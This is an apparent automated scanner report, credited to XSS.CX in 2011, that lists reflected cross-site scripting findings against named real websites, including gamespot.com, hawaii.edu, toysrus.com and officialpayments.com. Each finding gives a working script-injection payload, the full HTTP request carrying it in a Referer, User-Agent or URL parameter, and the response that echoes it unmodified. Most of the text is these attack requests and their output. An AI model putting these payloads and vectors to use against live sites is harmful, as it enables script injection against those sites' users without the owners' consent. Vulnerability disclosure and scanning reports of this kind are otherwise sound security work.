P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Fool=Uid=1552547950&Username=&V=5&DesktopPreference=false&R=false; domain=.fool.com; expires=Thu, 01-Apr-2021 04:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Tookie=T=38161382128527323652563704736534; domain=.fool.com; expires=Mon, 29-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 02:58:53 GMT
Content-Length: 25499

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head><title>
Fool.com: Stock Investing Adv
...[SNIP]...
<em>a5d48<script>alert(1)</script>f298079278e</em>
...[SNIP]...

3.101. http://www.gamespot.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0117"><script>alert(1)</script>07e27c0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=b0117"><script>alert(1)</script>07e27c0fcf

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:45:56 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 02:45:56 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040111=2; expires=Tue, 05-Apr-2011 02:45:56 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
3210&onid=39&PD=0&xref=http%3A%2F%2Fwww.google.com%2Fsearch&_unsafe_xref=http://www.google.com/search&xrq=hl%3Den%26q%3Db0117%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E07e27c0fcf&_unsafe_xrq=hl=en&q=b0117"><script>alert(1)</script>07e27c0fcf&edid=107&ts=1301712356&oid=3210-39_6-0-0&ld=www.gamespot.com&clgf=&globid=&url=http%3A%2F%2Fwww.gamespot.com%2Fpages%2Fmisc%2Ferror%2F404.html&_unsafe_url=http://www.gamespot.com/pages/misc/error/404.
...[SNIP]...

3.102. http://www.hawaii.edu/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hawaii.edu
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71870"><script>alert(1)</script>affe0ff9b1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hawaii.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=71870"><script>alert(1)</script>affe0ff9b1e

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:42:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6404
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="prev" value="http://www.google.com/search?hl=en&q=71870"><script>alert(1)</script>affe0ff9b1e" size="60">
...[SNIP]...

3.103. http://www.phonenumber.com/server-info [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.phonenumber.com
Path:	/server-info

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89499</script><script>alert(1)</script>7862d696a08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-info HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonenumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=89499</script><script>alert(1)</script>7862d696a08

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:58:31 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 23618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-a
...[SNIP]...

...[SNIP]...

3.104. http://www.pogo.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c13ec</script><script>alert(1)</script>d3eff21a584 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pogo.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=c13ec</script><script>alert(1)</script>d3eff21a584

Response

HTTP/1.1 403
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sat, 02 Apr 2011 02:41:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 3782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Authorization Failure
   </title>

...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=c13ec</script><script>alert(1)</script>d3eff21a584";
s.eVar2="pogo";
s.pageName="ERROR: Authorization Failure Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Authorization Failure Page:Non Authenticated";
s.prop8="Non Authent
...[SNIP]...

3.105. http://www.shutterfly.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.shutterfly.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be03f"><a>1441557110c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shutterfly.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=be03f"><a>1441557110c

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:43:06 GMT
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa TAIa PSAa PSDa OUR BUS ONL COM NAV INT STA PRE UNI"
Pragma: no-cache
Cache-Control: no-store
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 18331

<script>
pageloadTimeStart = new Date();
</script>

<script>
var userDataCookieName = "sflyData2";
var defaultCookieDomain = ".shutterfly.com";
</script>

<!DOCTYPE HTML PUBLIC "-
...[SNIP]...
n/sfly_uat_guid_edat/v3/location._error404_start.sfly/visitorid.e859515e-5cd2-11e0-8c21-355250911168/userid./partnerid.SFLY/partnersubid.WEB/campaignid./refid./url.http:__www.google.com_search_hl=en&q=be03f"><a>1441557110c">
...[SNIP]...

3.106. http://www.surveygizmo.com/server-status [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.surveygizmo.com
Path:	/server-status

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 47ac1--><script>alert(1)</script>189060c7204 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.347ac1--><script>alert(1)</script>189060c7204
Host: www.surveygizmo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:59:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Pingback: http://www.surveygizmo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 01:59:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: www2=true; expires=Mon, 02-May-2011 01:59:24 GMT; path=/; domain=www.surveygizmo.com
Connection: close
Content-Length: 21239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script>alert(1)</script>189060c7204 -->
...[SNIP]...

3.107. http://www.toysrus.com/server-status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.toysrus.com
Path:	/server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f9e"><script>alert(1)</script>f8d422c9a51 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toysrus.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 11f9e"><script>alert(1)</script>f8d422c9a51

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:52:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=htQKNWPQMFy9hvvZYsryqWThQtT0pXQg0Klb8LlbWQn0h2v2MKhB!857638899; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: browser_id=123795184804; expires=Tuesday, 30-Mar-2021 02:52:00 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 96034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--Preview Time
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1284386;type=trupa912;cat=truho083;u1=;u2=1;u3=;u4=2255956;u5=11f9e"><script>alert(1)</script>f8d422c9a51;ord=1;num=48926772?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.108. http://www.arstechnica.com/server-info [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.arstechnica.com
Path:	/server-info

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a470d"><script>alert(1)</script>440d8db37ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-infoa470d"><script>alert(1)</script>440d8db37ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arstechnica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Location: http://arstechnica.com/server-infoa470d"><script>alert(1)</script>440d8db37ab
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 122
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Sat, 02 Apr 2011 01:57:37 GMT
X-Varnish: 624032331
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

Redirecting to <a href="http://arstechnica.com/server-infoa470d"><script>alert(1)</script>440d8db37ab">arstechnica.com</a>

3.109. http://www.arstechnica.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.arstechnica.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec8d"><script>alert(1)</script>db2fe1c515d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status2ec8d"><script>alert(1)</script>db2fe1c515d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arstechnica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Location: http://arstechnica.com/server-status2ec8d"><script>alert(1)</script>db2fe1c515d
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 124
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Sat, 02 Apr 2011 02:32:44 GMT
X-Varnish: 127249974
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

Redirecting to <a href="http://arstechnica.com/server-status2ec8d"><script>alert(1)</script>db2fe1c515d">arstechnica.com</a>

3.110. http://www.azstarnet.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.azstarnet.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe4e"style%3d"x%3aexpression(alert(1))"e47bcfef74 was submitted in the REST URL parameter 1. This input was echoed as 2fe4e"style="x:expression(alert(1))"e47bcfef74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status2fe4e"style%3d"x%3aexpression(alert(1))"e47bcfef74 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azstarnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
Content-Type: text/html
Date: Sat, 02 Apr 2011 02:26:22 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://azstarnet.com/server-status2fe4e"style="x:expression(alert(1))"e47bcfef74/
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: azstarnet.com
Content-Length: 638

<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>301 Moved Permanently</title></head><body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/comm
...[SNIP]...
<a href="http://azstarnet.com/server-status2fe4e"style="x:expression(alert(1))"e47bcfef74/">
...[SNIP]...

3.111. http://www.officialpayments.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officialpayments.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b347"><script>alert(1)</script>98550e2cb77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status6b347"><script>alert(1)</script>98550e2cb77 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officialpayments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 273
Location: https://www.officialpayments.com:443/server-status6b347"><script>alert(1)</script>98550e2cb77

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.officialpayments.com:443/server-status6b347"><script>alert(1)</script>98550e2cb77">
...[SNIP]...

3.112. http://www.officialpayments.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officialpayments.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb26f"><script>alert(1)</script>627a97b11cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status?fb26f"><script>alert(1)</script>627a97b11cd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officialpayments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 276
Location: https://www.officialpayments.com:443/server-status?fb26f"><script>alert(1)</script>627a97b11cd=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.officialpayments.com:443/server-status?fb26f"><script>alert(1)</script>627a97b11cd=1">
...[SNIP]...

3.113. http://www.tns-global.com/server-status [name of an arbitrarily supplied request parameter] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tns-global.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24fc5"><script>alert(1)</script>54e2cbeaaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status?24fc5"><script>alert(1)</script>54e2cbeaaa3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tns-global.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 02:08:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.tnsglobal.com/server-status?24fc5"><script>alert(1)</script>54e2cbeaaa3=1
Content-Length: 270
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1><p>The document has moved <a href="http://www.tnsglobal.com/server-status?24fc5"><script>alert(1)</script>54e2cbeaaa3=1">
...[SNIP]...

Report generated by XSS.CX at Sat Apr 02 06:15:48 CDT 2011.